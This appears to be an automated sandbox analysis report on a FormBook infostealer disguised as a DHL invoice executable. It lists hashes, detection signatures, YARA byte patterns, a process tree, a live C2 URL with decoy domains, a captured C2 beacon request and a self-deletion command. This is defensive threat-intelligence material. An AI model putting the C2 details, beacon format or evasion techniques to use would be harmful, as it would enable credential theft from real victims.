Windows Analysis Report: invoice dhl.delivery document and original invoice sign.exe

Overview

General Information

Sample Name: invoice dhl.delivery document and original invoice sign.exe
Analysis ID: 532858
MD5: ebce26da75669d94dbc0550bf394b204
SHA1: bcc8f769e51cd9f8a160e58840f80a008e2b72e2
SHA256: 5fef546d71e9ed9f2e457bfd9aeb23a42a5074af37599c7fe4dcfeb8f687723c
Tags: DHL, exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • invoice dhl.delivery document and original invoice sign.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe" MD5: EBCE26DA75669D94DBC0550BF394B204)
    • invoice dhl.delivery document and original invoice sign.exe (PID: 6188 cmdline: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe MD5: EBCE26DA75669D94DBC0550BF394B204)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 7056 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 7092 cmdline: /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cuteprofessionalscrubs.com/9gr5/"], "decoy": ["newleafcosmetix.com", "richermanscastle.com", "ru-remonton.com", "2diandongche.com", "federaldados.design", "jeffreycookweb.com", "facecs.online", "xmeclarn.xyz", "olgasmith.xyz", "sneakersonlinesale.com", "playboyshiba.com", "angelamiglioli.com", "diitaldefynd.com", "whenevergames.com", "mtheartcustom.com", "vitalactivesupply.com", "twistblogr.com", "xn--i8s140at3d6u7c.tel", "baudelaireelhakim.com", "real-estate-miami-searcher.site", "131122.xyz", "meta-medial.com", "carvanaworkers.com", "mimamincloor.com", "aglutinarteshop.com", "portal-arch.com", "mandeide.com", "golfteesy.com", "carteretcancer.center", "cuansamping.com", "jhhnet.com", "oetthalr.xyz", "toesonly.com", "ctbizmag.com", "searchonzippy.com", "plantedapts.com", "matoneg.online", "takened.xyz", "meta4.life", "africanizedfund.com", "jukeboxjason.com", "folez.online", "troddu.com", "802135.com", "guiamat.net", "gladiasol.com", "meditationandyogacentre.com", "metaverserealestateagent.com", "boogyverse.net", "melissa-mochafest.com", "cozsweeps.com", "pickles-child.com", "metaversemediaschool.com", "ahfyfz.com", "ses-coating.com", "pozada.biz", "loldollmagic.com", "mountfrenchlodge.net", "25680125.xyz", "inusuklearning.com", "dnteagcud.xyz", "yupan.site", "acloud123.xyz", "asadosdonchorizo.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings

0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(The full report lists 31 memory dump entries; only the first are reproduced here.)

Unpacked PEs

Source | Rule | Description | Author | Strings

3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17a49:$sqlite3step: 68 34 1C 7B E1
  • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a78:$sqlite3text: 68 38 2A 90 C5
  • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(The full report lists 16 unpacked PE entries; only the first are reproduced here.)

Sigma Overview

System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started; Author: juju4; Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 7056

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp; Malware Configuration Extractor: FormBook (full C2 list and decoy domains as given under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: invoice dhl.delivery document and original invoice sign.exe; ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match; File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: invoice dhl.delivery document and original invoice sign.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: invoice dhl.delivery document and original invoice sign.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msdt.pdbGCTL; source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP; source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: invoice dhl.delivery document and original invoice sign.exe, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
Source: Binary string: msdt.pdb; source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 4x nop then pop edi

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Network Connect: 44.227.76.166 80
Source: C:\Windows\explorer.exe; Domain query: www.mimamincloor.com
Source: C:\Windows\explorer.exe; Domain query: www.federaldados.design
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.cuteprofessionalscrubs.com/9gr5/
Source: global traffic; HTTP traffic detected: GET /9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== HTTP/1.1; Host: www.federaldados.design; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View; IP Address: 44.227.76.166
Source: msdt.exe, 0000000B.00000002.623782144.00000000052FF000.00000004.00020000.sdmp; String found in binary or memory: http://federaldados.design
Source: explorer.exe, 00000005.00000000.397083667.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.383799342.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.425291445.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.365143157.000000000095C000.00000004.00000020.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown; DNS traffic detected: queries for: www.federaldados.design

E-Banking Fraud:

Yara detected FormBook (sources: the same seven unpacked PE files and eleven memory dumps listed for this signature under AV Detection)

System Summary:

Malicious sample detected (through community Yara rule)
Matched rules (every source listed below matched both):
  • autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  • detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Sources:
  • 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE
  • 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE
  • 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE
  • 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE
  • 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE
  • 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE
  • 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE
  • 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY
  • 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
  • 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY
  • 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
  • 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY
  • 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  • 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  • 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
  • 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  • 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY
  • 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY
Initial sample is a PE file and has a suspicious name
Source: initial sample; Static PE information: Filename: invoice dhl.delivery document and original invoice sign.exe
Executable has a suspicious name (potential lure to open the executable)
Source: invoice dhl.delivery document and original invoice sign.exe; Static file information: Suspicious name
Source: invoice dhl.delivery document and original invoice sign.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Matched rule metadata (identical for every unpacked PE source listed below):
  • Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
  • Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Sources (type: UNPACKEDPE) and the rules they matched:
  • 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack: Formbook_1, Formbook
  • 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack: Formbook_1, Formbook
  • 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack: Formbook_1, Formbook
  • 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack: Formbook_1, Formbook
  • 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack: Formbook_1, Formbook
  • 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack: Formbook_1
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 0_2_004E2855
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 0_2_00E2C554
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 0_2_00E2E8AB
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 0_2_00E2E8B8
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_00401030
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041DB58
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041E4E9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_00402D89
